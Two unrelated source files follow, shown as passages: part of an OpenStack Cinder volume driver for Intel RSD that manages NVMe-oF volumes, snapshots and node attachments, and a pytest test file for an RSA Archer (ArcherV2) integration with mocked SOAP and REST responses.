data=(_("initialize: Unsupported rsd_lib version: "
"%(current)s < %(expected)s.")
% {'current': rsdlib._redfish_version,
'expected': "1.1.0"}))
LOG.info("initialize: Connected to %s at version %s.",
url, rsdlib._rsd_api_version)
return cls(rsdlib)
def _get_storage(self, storage_url):
ss_url = "/".join(storage_url.split("/", 5)[:5])
storage_service = self.rsdlib.get_storage_service(ss_url)
return storage_service
def _get_storages(self, filter_nvme=True):
ret = []
for storage in (self.rsdlib
.get_storage_service_collection().get_members()):
if filter_nvme:
drives = storage.drives.get_members()
if drives and (any(map(lambda drive:
False if not drive.protocol
else 'nvme' in drive.protocol.lower(),
drives))):
ret.append(storage)
else:
ret.append(storage)
return ret
def _get_node(self, node_url):
return self.rsdlib.get_node(node_url)
def _get_volume(self, volume_url):
ss = self._get_storage(volume_url)
volume = ss.volumes.get_member(volume_url)
return volume
def _get_providing_pool(self, volume):
len_cs = len(volume.capacity_sources)
if len_cs != 1:
raise exception.ValidationError(
detail=(_("Volume %(vol)s has %(len_cs)d capacity_sources!")
% {'vol': volume.path,
'len_cs': len_cs}))
len_pp = len(volume.capacity_sources[0].providing_pools)
if len_pp != 1:
raise exception.ValidationError(
detail=(_("Volume %(vol)s has %(len_pp)d providing_pools!")
% {'vol': volume.path,
'len_pp': len_pp}))
providing_pool = volume.capacity_sources[0].providing_pools[0]
return providing_pool.get_members()[0].path
def _create_vol_or_snap(self,
storage,
size_in_bytes,
pool_url=None,
source_snap=None,
source_vol=None):
capacity_sources = None
if pool_url:
capacity_sources = [{
"ProvidingPools": [{
"@odata.id": pool_url
}]
}]
replica_infos = None
if source_snap:
replica_infos = [{
"ReplicaType": "Clone",
"Replica": {"@odata.id": source_snap}
}]
if source_vol:
raise exception.InvalidInput(
reason=(_("Cannot specify both source_snap=%(snap)s and "
"source_vol=%(vol)s!")
% {'snap': source_snap,
'vol': source_vol}))
elif source_vol:
replica_infos = [{
"ReplicaType": "Snapshot",
"Replica": {"@odata.id": source_vol}
}]
LOG.debug("Creating... with size_byte=%s, "
"capacity_sources=%s, replica_infos=%s",
size_in_bytes, capacity_sources, replica_infos)
volume_url = storage.volumes.create_volume(
size_in_bytes,
capacity_sources=capacity_sources,
replica_infos=replica_infos)
LOG.debug("Created volume_url=%s", volume_url)
return volume_url
def create_volume(self, size_in_gb):
size_in_bytes = size_in_gb * units.Gi
try:
for storage in self._get_storages():
try:
volume_url = self._create_vol_or_snap(
storage, size_in_bytes)
LOG.info("RSD volume %s created, with size %s GiB",
volume_url, size_in_gb)
return volume_url
# NOTE(Yingxin): Currently, we capture sushy_exception to
# identify that volume creation is failed at RSD backend.
except (sushy_exceptions.HTTPError,
sushy_exceptions.ConnectionError) as e:
LOG.warning("skipped storage %s for creation error %s",
storage.path, e)
except Exception:
LOG.exception("Create volume failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create new volume with %d GiB') % size_in_gb))
def create_snap(self, volume_url):
try:
ss = self._get_storage(volume_url)
volume = self._get_volume(volume_url)
pool_url = self._get_providing_pool(volume)
snap_url = self._create_vol_or_snap(
ss, volume.capacity_bytes,
pool_url=pool_url,
source_vol=volume_url)
LOG.info("RSD snapshot %s created, from volume %s",
snap_url, volume_url)
return snap_url
except Exception:
LOG.exception("Create snapshot failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create snapshot from volume %s')
% volume_url))
def create_volume_from_snap(self, snap_url, size_in_gb=None):
try:
ss = self._get_storage(snap_url)
snap = self._get_volume(snap_url)
if not size_in_gb:
size_in_bytes = snap.capacity_bytes
else:
size_in_bytes = size_in_gb * units.Gi
pool_url = self._get_providing_pool(snap)
volume_url = self._create_vol_or_snap(
ss, size_in_bytes,
pool_url=pool_url,
source_snap=snap_url)
LOG.info("RSD volume %s created, from snap %s, "
"with size %s GiB.",
volume_url, snap_url,
size_in_bytes / units.Gi)
return volume_url
except Exception:
LOG.exception("Create volume from snapshot failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create volume from snapshot %s')
% snap_url))
def clone_volume(self, volume_url, size_in_gb=None):
try:
ss = self._get_storage(volume_url)
origin_volume = self._get_volume(volume_url)
pool_url = self._get_providing_pool(origin_volume)
snap_url = self._create_vol_or_snap(
ss, origin_volume.capacity_bytes,
pool_url=pool_url,
source_vol=volume_url)
except Exception:
LOG.exception("Clone volume failed (create snapshot phase)")
raise exception.VolumeBackendAPIException(
data=(_('Unable to create volume from volume %s, snapshot '
'creation failed.')
% volume_url))
try:
if not size_in_gb:
size_in_bytes = origin_volume.capacity_bytes
else:
size_in_bytes = size_in_gb * units.Gi
new_vol_url = self._create_vol_or_snap(
ss, size_in_bytes,
pool_url=pool_url,
source_snap=snap_url)
LOG.info("RSD volume %s created, from volume %s and snap %s, "
"with size %s GiB.",
new_vol_url, volume_url, snap_url,
size_in_bytes / units.Gi)
return new_vol_url, snap_url
except Exception:
LOG.exception("Clone volume failed (clone volume phase)")
try:
self.delete_vol_or_snap(snap_url)
except Exception:
LOG.exception("Clone volume failed (undo snapshot)")
raise exception.VolumeBackendAPIException(
data=(_('Unable to delete the temp snapshot %(snap)s, '
'during a failure to clone volume %(vol)s.')
% {'snap': snap_url,
'vol': volume_url}))
raise exception.VolumeBackendAPIException(
data=(_('Unable to create volume from volume %s, volume '
'creation failed.')
% volume_url))
def extend_volume(self, volume_url, size_in_gb):
size_in_bytes = size_in_gb * units.Gi
try:
volume = self._get_volume(volume_url)
volume.resize(size_in_bytes)
LOG.info("RSD volume %s resized to %s Bytes",
volume.path, size_in_bytes)
except Exception:
LOG.exception("Extend volume failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to extend volume %s.') % volume_url))
def delete_vol_or_snap(self, volume_url,
volume_name='', ignore_non_exist=False):
try:
try:
volume = self._get_volume(volume_url)
except sushy_exceptions.ResourceNotFoundError:
if ignore_non_exist:
LOG.warning("Deleted non existent vol/snap %s", volume_url)
else:
raise
if volume.links.endpoints:
LOG.warning("Delete vol/snap failed, attached: %s", volume_url)
raise exception.VolumeIsBusy(_("Volume is already attached"),
volume_name=volume_name)
volume.delete()
except sushy_exceptions.BadRequestError as e:
try:
msg = e.body['@Message.ExtendedInfo'][0]['Message']
if (msg == "Cannot delete source snapshot volume when "
"other clone volumes are based on this snapshot."):
LOG.warning("Delete vol/snap failed, has-deps: %s",
volume_url)
raise exception.SnapshotIsBusy(snapshot_name=volume_name)
except Exception:
LOG.exception("Delete vol/snap failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to delete volume %s.') % volume_url))
except Exception:
LOG.exception("Delete vol/snap failed")
raise exception.VolumeBackendAPIException(
data=(_('Unable to delete volume %s.') % volume_url))
LOG.info("RSD volume deleted: %s", volume_url)
def get_node_url_by_uuid(self, uuid):
uuid = uuid.upper()
try:
nodes = self.rsdlib.get_node_collection().get_members()
for node in nodes:
node_system = None
if node:
node_system = self.rsdlib.get_system(
node.links.computer_system)
if (node and
node_system and
node_system.uuid and
node_system.uuid.upper() == uuid):
return node.path
except Exception:
LOG.exception("Get node url failed")
return ""
def get_stats(self):
free_capacity_gb = 0
total_capacity_gb = 0
allocated_capacity_gb = 0
total_volumes = 0
try:
storages = self._get_storages()
for storage in storages:
for pool in storage.storage_pools.get_members():
total_capacity_gb += (
float(pool.capacity.allocated_bytes or 0) / units.Gi)
allocated_capacity_gb += (
float(pool.capacity.consumed_bytes or 0) / units.Gi)
total_volumes += len(storage.volumes.members_identities)
free_capacity_gb = total_capacity_gb - allocated_capacity_gb
LOG.info("Got RSD stats: free_gb:%s, total_gb:%s, "
"allocated_gb:%s, volumes:%s",
free_capacity_gb,
total_capacity_gb,
allocated_capacity_gb,
total_volumes)
except Exception:
LOG.exception("Get stats failed")
return (free_capacity_gb,
total_capacity_gb,
allocated_capacity_gb,
total_volumes)
def _get_nqn_endpoints(self, endpoint_urls):
ret = []
for endpoint_url in endpoint_urls:
endpoint_json = (
json.loads(self.rsdlib._conn.get(endpoint_url).text))
for ident in endpoint_json["Identifiers"]:
if ident["DurableNameFormat"] == "NQN":
nqn = ident["DurableName"]
ret.append((nqn, endpoint_json))
break
return ret
@utils.retry(RSDRetryableException,
interval=4,
retries=5,
backoff_rate=2)
def attach_volume_to_node(self, volume_url, node_url):
LOG.info('Trying attach from node %s to volume %s',
node_url, volume_url)
try:
volume = self._get_volume(volume_url)
node = self._get_node(node_url)
if len(volume.links.endpoints) > 0:
raise exception.ValidationError(
detail=(_("Volume %s already attached") % volume_url))
node.attach_endpoint(volume.path)
except sushy_exceptions.InvalidParameterValueError:
LOG.exception("Attach volume failed (not allowable)")
raise RSDRetryableException(
reason=(_("Not allowed to attach from "
"%(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
except Exception:
LOG.exception("Attach volume failed (attach phase)")
raise exception.VolumeBackendAPIException(
data=(_("Attach failed from %(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
try:
volume.refresh()
node.refresh()
v_endpoints = volume.links.endpoints
v_endpoints = self._get_nqn_endpoints(v_endpoints)
if len(v_endpoints) != 1:
raise exception.ValidationError(
detail=(_("Attach volume error: %d target nqns")
% len(v_endpoints)))
target_nqn, v_endpoint = v_endpoints[0]
ip_transports = v_endpoint["IPTransportDetails"]
if len(ip_transports) != 1:
raise exception.ValidationError(
detail=(_("Attach volume error: %d target ips")
% len(ip_transports)))
ip_transport = ip_transports[0]
target_ip = ip_transport["IPv4Address"]["Address"]
target_port = ip_transport["Port"]
node_system = self.rsdlib.get_system(node.links.computer_system)
n_endpoints = tuple(
val["@odata.id"]
for val in node_system.json["Links"]["Endpoints"])
n_endpoints = self._get_nqn_endpoints(n_endpoints)
if len(n_endpoints) == 0:
raise exception.ValidationError(
detail=(_("Attach volume error: %d host nqns")
% len(n_endpoints)))
host_nqn, v_endpoint = n_endpoints[0]
LOG.info('Attachment successful: Retrieved target IP %s, '
'target Port %s, target NQN %s and initiator NQN %s',
target_ip, target_port, target_nqn, host_nqn)
return (target_ip, target_port, target_nqn, host_nqn)
except Exception as e:
LOG.exception("Attach volume failed (post-attach)")
try:
node.refresh()
node.detach_endpoint(volume.path)
LOG.info('Detached from node %s to volume %s',
node_url, volume_url)
except Exception:
LOG.exception("Attach volume failed (undo attach)")
raise exception.VolumeBackendAPIException(
data=(_("Undo-attach failed from %(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
if isinstance(e, exception.ValidationError):
raise RSDRetryableException(
reason=(_("Validation error during post-attach from "
"%(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
else:
raise exception.VolumeBackendAPIException(
data=(_("Post-attach failed from %(node)s to %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
def detach_volume_from_node(self, volume_url, node_url):
LOG.info('Trying detach from node %s for volume %s',
node_url, volume_url)
try:
volume = self._get_volume(volume_url)
node = self._get_node(node_url)
node.detach_endpoint(volume.path)
except Exception:
LOG.exception("Detach volume failed")
raise exception.VolumeBackendAPIException(
data=(_("Detach failed from %(node)s for %(volume)s.")
% {'node': node_url,
'volume': volume_url}))
def detach_all_node_connections_for_volume(self, volume_url):
try:
volume = self._get_volume(volume_url)
nodes = self.rsdlib.get_node_collection().get_members()
for node in nodes:
if node:
if volume.path in node.get_allowed_detach_endpoints():
node.detach_endpoint(volume.path)
except Exception:
LOG.exception("Detach failed for volume from all host "
"connections")
raise exception.VolumeBackendAPIException(
data=(_("Detach failed for %(volume)s from all host "
"connections.")
% {'volume': volume_url}))
@interface.volumedriver
class RSDDriver(driver.VolumeDriver):
"""Openstack driver to perform NVMe-oF volume management in RSD Solution
.. code-block:: none
Version History:
1.0.0: Initial driver
"""
VERSION = '1.0.0'
CI_WIKI_NAME = 'INTEL-RSD-CI'
def __init__(self, *args, **kwargs):
super(RSDDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(RSD_OPTS)
self.rsdClient = None
@staticmethod
def get_driver_options():
return RSD_OPTS
@volume_utils.trace
def do_setup(self, context):
self.rsdClient = RSDClient.initialize(
self.configuration.podm_url,
self.configuration.podm_username,
self.configuration.podm_password,
self.configuration.suppress_requests_ssl_warnings)
def check_for_setup_error(self):
pass
@volume_utils.trace
def create_volume(self, volume):
size_in_gb = int(volume['size'])
volume_url = self.rsdClient.create_volume(size_in_gb)
return {'provider_location': volume_url}
@volume_utils.trace
def delete_volume(self, volume):
volume_url = volume['provider_location']
if not volume_url:
return
self.rsdClient.delete_vol_or_snap(volume_url,
volume_name=volume.name,
ignore_non_exist=True)
provider_snap_url = volume.metadata.get("rsd_provider_snap")
if provider_snap_url:
self.rsdClient.delete_vol_or_snap(provider_snap_url,
volume_name=volume.name,
ignore_non_exist=True)
@volume_utils.trace
def _update_volume_stats(self):
backend_name = (
self.configuration.safe_get('volume_backend_name') or 'RSD')
ret = self.rsdClient.get_stats()
(free_capacity_gb,
total_capacity_gb,
allocated_capacity_gb,
total_volumes) = ret
spool = {}
spool['pool_name'] = backend_name
spool['total_capacity_gb'] = total_capacity_gb
spool['free_capacity_gb'] = free_capacity_gb
spool['allocated_capacity_gb'] = allocated_capacity_gb
spool['thin_provisioning_support'] = True
spool['thick_provisioning_support'] = True
spool['multiattach'] = False
self._stats['volume_backend_name'] = backend_name
self._stats['vendor_name'] = 'Intel'
self._stats['driver_version'] = self.VERSION
self._stats['storage_protocol'] = 'nvmeof'
# SinglePool
self._stats['pools'] = [spool]
@volume_utils.trace
def initialize_connection(self, volume, connector, **kwargs):
uuid = connector.get("system uuid")
if not uuid:
msg = _("initialize_connection error: no uuid available!")
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
node_url = self.rsdClient.get_node_url_by_uuid(uuid)
if not node_url:
msg = (_("initialize_connection error: no node_url from uuid %s!")
% uuid)
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
volume_url = volume['provider_location']
target_ip, target_port, target_nqn, initiator_nqn = (
self.rsdClient.attach_volume_to_node(volume_url, node_url))
conn_info = {
'driver_volume_type': 'nvmeof',
'data': {
'transport_type': 'rdma',
'host_nqn': initiator_nqn,
'nqn': target_nqn,
'target_port': target_port,
'target_portal': target_ip,
}
}
return conn_info
@volume_utils.trace
def terminate_connection(self, volume, connector, **kwargs):
if connector is None:
# None connector means force-detach
volume_url = volume['provider_location']
self.rsdClient.detach_all_node_connections_for_volume(volume_url)
return
uuid = connector.get("system uuid")
if not uuid:
msg = _("terminate_connection error: no uuid available!")
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
node_url = self.rsdClient.get_node_url_by_uuid(uuid)
if not node_url:
msg = (_("terminate_connection error: no node_url from uuid %s!")
% uuid)
LOG.exception(msg)
raise exception.VolumeBackendAPIException(msg)
volume_url = volume['provider_location']
self.rsdClient.detach_volume_from_node(volume_url, node_url)
def ensure_export(self, context, volume):
pass
def create_export(self, context, volume, connector):
pass
def remove_export(self, context, volume):
pass
@volume_utils.trace
def create_volume_from_snapshot(self, volume, snapshot):
snap_url = snapshot.provider_location
old_size_in_gb = snapshot.volume_size
size_in_gb = volume.size
volume_url = self.rsdClient.create_volume_from_snap(snap_url)
if size_in_gb != old_size_in_gb:
try:
self.rsdClient.extend_volume(volume_url, size_in_gb)
except Exception:
self.rsdClient.delete_vol_or_snap(volume_url,
volume_name=volume.name)
raise
return {'provider_location': volume_url}
@volume_utils.trace
def create_snapshot(self, snapshot):
volume_url = snapshot.volume.provider_location
snap_url = self.rsdClient.create_snap(volume_url)
snapshot.provider_location = snap_url
snapshot.save()
@volume_utils.trace
def delete_snapshot(self, snapshot):
snap_url = snapshot.provider_location
if not snap_url:
return
self.rsdClient.delete_vol_or_snap(snap_url,
volume_name=snapshot.name,
ignore_non_exist=True)
@volume_utils.trace
def extend_volume(self, volume, new_size):
volume_url = volume.provider_location
self.rsdClient.extend_volume(volume_url, new_size)
def clone_image(self, context, volume,
image_location, image_meta,
image_service):
return None, False
@volume_utils.trace
def create_cloned_volume(self, volume, src_vref):
volume_url = src_vref.provider_location
old_size_in_gb = src_vref.size
size_in_gb = volume.size
new_vol_url, provider_snap_url = self.rsdClient.clone_volume(
volume_url)
metadata = get_volume_metadata(volume)
metadata["rsd_provider_snap"] = provider_snap_url
if size_in_gb != old_size_in_gb:
try:
self.rsdClient.extend_volume(new_vol_url, size_in_gb)
except Exception:
self.rsdClient.delete_vol_or_snap(new_vol_url,
volume_name=volume.name)
self.rsdClient.delete_vol_or_snap(provider_snap_url,
volume_name=volume.name)
raise
return {'provider_location': new_vol_url,
'metadata': metadata}
|
|
import copy
from datetime import datetime, timezone
import pytest
from CommonServerPython import DemistoException
import demistomock as demisto
from ArcherV2 import Client, extract_from_xml, generate_field_contents, get_errors_from_res, generate_field_value, \
fetch_incidents, get_fetch_time, parser, OCCURRED_FORMAT, search_records_by_report_command, search_records_soap_request
BASE_URL = 'https://test.com/'
GET_TOKEN_SOAP = '<?xml version="1.0" encoding="utf-8"?>' + \
'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"' \
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \
' xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body>' + \
' <CreateUserSessionFromInstanceResponse xmlns="http://archer-tech.com/webservices/">' + \
' <CreateUserSessionFromInstanceResult>TOKEN</CreateUserSessionFromInstanceResult>' + \
' </CreateUserSessionFromInstanceResponse>' + \
' </soap:Body>' + \
'</soap:Envelope>'
XML_FOR_TEST = '<?xml version="1.0" encoding="utf-8"?>' + \
'<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \
'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \
' <soap:Body>' + \
' <GetValueListForField xmlns="http://archer-tech.com/webservices/">' + \
' <fieldId>6969</fieldId>' + \
' </GetValueListForField>' + \
' </soap:Body>' + \
'</soap:Envelope>'
GET_LEVEL_RES = [{"IsSuccessful": True, "RequestedObject": {"Id": 123}}]
FIELD_DEFINITION_RES = [
{
"IsSuccessful": True,
"RequestedObject": {
"Id": 1, "Type": 7, "Name": "External Links", "IsRequired": False
}
},
{
"IsSuccessful": True,
"RequestedObject": {
"Id": 2, "Type": 1, "Name": "Device Name", "IsRequired": True, "RelatedValuesListId": 8
}
}
]
GET_LEVELS_BY_APP = {
'level': 123, 'mapping': {'1': {
'Type': 7, 'Name': 'External Links', 'FieldId': "1", 'IsRequired': False, 'RelatedValuesListId': None},
'2': {
'Type': 1, 'Name': 'Device Name', 'FieldId': "2",
'IsRequired': True, 'RelatedValuesListId': 8}
}}
GET_FIElD_DEFINITION_RES = {
"RequestedObject": {"RelatedValuesListId": 62, "Type": 4},
"IsSuccessful": True,
"ValidationMessages": []
}
VALUE_LIST_RES = {
"RequestedObject": {
"Children": [
{"Data": {"Id": 471, "Name": "Low", "IsSelectable": True}},
{"Data": {"Id": 472, "Name": "Medium", "IsSelectable": True}},
{"Data": {"Id": 473, "Name": "High", "IsSelectable": True}}]},
"IsSuccessful": True, "ValidationMessages": []
}
VALUE_LIST_RES_FOR_SOURCE = {
"RequestedObject": {
"Children": [
{"Data": {"Id": 471, "Name": "ArcSight", "IsSelectable": True}},
{"Data": {"Id": 472, "Name": "Medium", "IsSelectable": True}},
{"Data": {"Id": 473, "Name": "High", "IsSelectable": True}}]},
"IsSuccessful": True, "ValidationMessages": []
}
VALUE_LIST_FIELD_DATA = {
"FieldId": 304, "ValuesList": [
{"Id": 471, "Name": "Low", "IsSelectable": True},
{"Id": 472, "Name": "Medium", "IsSelectable": True},
{"Id": 473, "Name": "High", "IsSelectable": True}]}
RES_WITH_ERRORS = {
'ValidationMessages': [
{'ResourcedMessage': 'The Type field is a required field.'},
{'ResourcedMessage': 'The Device Name field is a required field.'}]
}
GET_RECORD_RES_failed = {'ValidationMessages': [{'ResourcedMessage': 'No resource found.'}]}
GET_RECORD_RES_SUCCESS = \
{
"Links": [],
"RequestedObject": {
"Id": 1010,
"LevelId": 123,
"FieldContents": {
"2": {
"Type": 1,
"Value": "The device name",
"FieldId": 2
}
}
},
"IsSuccessful": True,
"ValidationMessages": []
}
INCIDENT_RECORD = {
"record": {
"Id": "227602",
"Status": "New",
"Name": "Incident 01",
"Date/Time Reported": "2018-03-26T10:03:32.243Z"
},
"raw": {
"@contentId": "227602",
"@levelId": "67",
"@levelGuid": "b0c2d9a1-167c-4fee-ad91-4b4e7b098b4b",
"@moduleId": "75",
"@parentId": "0",
"Field": [
{
"@id": "302",
"@guid": "3ec0f462-4c17-4036-b0fa-2f04f3aba3d0",
"@type": "4",
"ListValues": {
"ListValue": {
"@id": "466",
"@displayName": "New",
"#text": "New"
}
}
},
{
"@id": "305",
"@guid": "9c5e3de1-299b-430f-998a-185ad86e2e79",
"@type": "3",
"@xmlConvertedValue": "2018-03-26T10:03:32.243Z",
"#text": "26/03/2018 06:03:32"
}
]
}
}
INCIDENT_RECORD_US_TZ = {
"record": {
"Id": "227603",
"Title": "Test",
"created date": "2/25/2021 8:45:55 AM"
},
"raw": {
"@contentId": "227603",
"@levelId": "67",
"@levelGuid": "b0c2d9a1-167c-4fee-ad91-4b4e7b098b4b",
"@moduleId": "75",
"@parentId": "0",
"Field": [
{
"@id": "35339",
"@guid": "9c5e3de1-299b-430f-998a-185ad86e2e79",
"@type": "1",
"#text": "Test"
},
{
"@id": "53075",
"@guid": "9c5e3de1-299b-430f-998a-185ad86e2e80",
"@type": "21",
"@xmlConvertedValue": "2021-02-25T08:45:55.977Z",
"#text": "2/25/2021 8:45:55 AM"
}
]
}
}
SEARCH_RECORDS_RES = \
'<?xml version="1.0" encoding="utf-8"?>' + \
'<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"' \
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">' + \
' <soap:Body>' + \
' <ExecuteSearchResponse xmlns="http://archer-tech.com/webservices/">' + \
' <ExecuteSearchResult>' + \
'<?xml version="1.0" encoding="utf-16"?><Records count="6"><Metadata><' \
'FieldDefinitions><FieldDefinition id="2" name="Device Name" alias="Name_Full" /><' \
'/FieldDefinitions></Metadata><LevelCounts><LevelCount id="37" count="6" /><' \
'/LevelCounts><Record contentId="238756" levelId="37" moduleId="84" parentId="0"><Field id="2" guid=' \
'"9bc24614-2bc7-4849-a3a3-054729854ab4" type="1">DEVICE NAME</Field></Record></Records>' + \
' </ExecuteSearchResult>' + \
' </ExecuteSearchResponse>' + \
' </soap:Body>' + \
'</soap:Envelope>'
GET_RESPONSE_NOT_SUCCESSFUL_JSON = {"IsSuccessful": False, "RequestedObject": None,
"ValidationMessages": [{"Reason": "Validation", "Severity": 3,
"MessageKey": "ValidationMessageTemplates"
":LoginNotValid",
"Description": "",
"Location": -1,
"ErroredValue": None,
"Validator": "ArcherApi."
"Controllers.Security"
"Controller, ArcherApi, "
"Version=6.5.200.1045, "
"Culture=neutral, "
"PublicKeyToken=null",
"XmlData": None,
"ResourcedMessage": None}]}
GET_RESPONSE_SUCCESSFUL_JSON = {"IsSuccessful": True, "RequestedObject": {'SessionToken': 'session-id'}}
SEARCH_RECORDS_BY_REPORT_RES = \
'<Records count="18">' + \
'<Metadata>' + \
' <FieldDefinitions>' + \
' <FieldDefinition id="1580" name="Policy Name" alias="Policy_Name"/>' + \
' <FieldDefinition id="1583" name="Policy Statement"' + \
' alias="Policy_Statement"/>' + \
' </FieldDefinitions>' + \
'</Metadata>' + \
'<LevelCounts>' + \
' <LevelCount id="3" count="18"/>' + \
'</LevelCounts>' + \
'<Record contentId="1720" levelId="3" moduleId="65" parentId="0">' + \
' <Field id="1580" type="1">00.0 Introduction</Field>' + \
' <Field id="1583" type="1">Information' + \
' </Field>' + \
'</Record>' + \
'</Records>'
MOCK_READABLE_SEARCH_RECORDS_BY_REPORT = "### Search records by report results\n|Id|Policy Name|Policy " \
"Statement|\n|---|---|---|\n| 1720 | 00.0 Introduction | Information |\n"
MOCK_RESULTS_SEARCH_RECORDS_BY_REPORT = {
'Records': {'@count': '18', 'Metadata': {'FieldDefinitions': {
'FieldDefinition': [{'@id': '1580', '@name': 'Policy Name', '@alias': 'Policy_Name'},
{'@id': '1583', '@name': 'Policy Statement', '@alias': 'Policy_Statement'}]}},
'LevelCounts': {'LevelCount': {'@id': '3', '@count': '18'}},
'Record': {'@contentId': '1720', '@levelId': '3',
'@moduleId': '65',
'@parentId': '0',
'Field': [{'@id': '1580', '@type': '1',
'#text': '00.0 Introduction'},
{'@id': '1583', '@type': '1',
'#text': "Information"}]}}
}
GET_LEVEL_RES_2 = [
{
"RequestedObject": {
"Type": 1,
"Id": 1580,
"LevelId": 3,
"Name": "Policy Name",
"Alias": "Policy_Name"
},
"IsSuccessful": True
},
{
"RequestedObject": {
"Type": 1,
"Id": 1583,
"LevelId": 3,
"Name": "Policy Statement",
"Alias": "Policy_Statement"
},
"IsSuccessful": True
}
]
class TestArcherV2:
def test_extract_from_xml(self):
field_id = extract_from_xml(XML_FOR_TEST, 'Envelope.Body.GetValueListForField.fieldId')
assert field_id == '6969'
def test_get_level_by_app_id(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/system/level/module/1', json=GET_LEVEL_RES)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/level/123', json=FIELD_DEFINITION_RES)
client = Client(BASE_URL, '', '', '', '', 400)
levels = client.get_level_by_app_id('1')
assert levels == GET_LEVELS_BY_APP
@pytest.mark.parametrize('requested_object, is_successful',
[(GET_RESPONSE_NOT_SUCCESSFUL_JSON, False),
(GET_RESPONSE_SUCCESSFUL_JSON, True)])
def test_update_session(self, mocker, requests_mock, requested_object, is_successful):
requests_mock.post(BASE_URL + 'api/core/security/login', json=requested_object)
mocker.patch.object(demisto, 'results')
client = Client(BASE_URL, '', '', '', '', 400)
if is_successful:
client.update_session()
assert demisto.results.call_count == 0
else:
with pytest.raises(SystemExit) as e:
# in case login wasn't successful, return_error will exit with a reason (for example, LoginNotValid)
# return_error reached
client.update_session()
assert e
def test_update_session_fail_parsing(self, mocker):
"""
Given:
an exception raised from _http_request who failed to pares json object
When:
- initiating session
Then:
- Raise exception with message to check the provided url
"""
mocker.patch.object(Client, '_http_request', side_effect=DemistoException("Failed to parse json object from "
"response: b\"<html><head><script>"
"window.top.location='/Default.aspx';"
"</script></head><body>"
"</body></html>"))
client = Client(BASE_URL, '', '', '', '', 400)
with pytest.raises(DemistoException) as e:
client.update_session()
assert "Check the given URL, it can be a redirect issue" in str(e.value)
def test_generate_field_contents(self):
client = Client(BASE_URL, '', '', '', '', 400)
field = generate_field_contents(client, '{"Device Name":"Macbook"}', GET_LEVELS_BY_APP['mapping'])
assert field == {'2': {'Type': 1, 'Value': 'Macbook', 'FieldId': '2'}}
def test_get_errors_from_res(self):
errors = get_errors_from_res(RES_WITH_ERRORS)
assert errors == 'The Type field is a required field.\nThe Device Name field is a required field.'
def test_get_record_failed(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/content/1010', json=GET_RECORD_RES_failed)
client = Client(BASE_URL, '', '', '', '', 400)
record, res, errors = client.get_record(75, 1010)
assert errors == 'No resource found.'
assert res
assert record == {}
def test_get_record_success(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.get(BASE_URL + 'api/core/content/1010', json=GET_RECORD_RES_SUCCESS)
requests_mock.get(BASE_URL + 'api/core/system/level/module/1', json=GET_LEVEL_RES)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/level/123', json=FIELD_DEFINITION_RES)
client = Client(BASE_URL, '', '', '', '', 400)
record, res, errors = client.get_record(1, 1010)
assert errors is None
assert res
assert record == {'Device Name': 'The device name', 'Id': 1010}
def test_record_to_incident(self):
client = Client(BASE_URL, '', '', '', '', 400)
record = copy.deepcopy(INCIDENT_RECORD)
record['raw']['Field'][1]['@xmlConvertedValue'] = '2018-03-26T10:03:00Z'
incident, incident_created_time = client.record_to_incident(record, 75, '305')
assert incident_created_time == datetime(2018, 3, 26, 10, 3, tzinfo=timezone.utc)
assert incident['name'] == 'RSA Archer Incident: 227602'
assert incident['occurred'] == '2018-03-26T10:03:00Z'
def test_search_records(self, requests_mock):
requests_mock.post(BASE_URL + 'api/core/security/login',
json={'RequestedObject': {'SessionToken': 'session-id'}, 'IsSuccessful': True})
requests_mock.post(BASE_URL + 'ws/general.asmx', text=GET_TOKEN_SOAP)
requests_mock.get(BASE_URL + 'api/core/system/level/module/1', json=GET_LEVEL_RES)
requests_mock.get(BASE_URL + 'api/core/system/fielddefinition/level/123', json=FIELD_DEFINITION_RES)
requests_mock.post(BASE_URL + 'ws/search.asmx', text=SEARCH_RECORDS_RES)
client = Client(BASE_URL, '', '', '', '', 400)
records, raw_res = client.search_records(1, ['External Links', 'Device Name'])
assert raw_res
assert len(records) == 1
assert records[0]['record']['Id'] == '238756'
assert records[0]['record']['Device Name'] == 'DEVICE NAME'
@pytest.mark.parametrize('field_name,field_to_search_by_id,expected_condition', [
('id_field_name', '', '<TextFilterCondition> <Operator>Contains</Operator> '
+ '<Field name="id_field_name">field_id</Field> <Value>1234</Value></TextFilterCondition >'),
('id_field_name', 'id_field_name', '<ContentFilterCondition> <Level>5678</Level> '
+ '<Operator>Equals</Operator> <Values><Value>1234</Value></Values></ContentFilterCondition>')
])
def test_search_records_soap_request(self, field_name, field_to_search_by_id, expected_condition):
"""
Given:
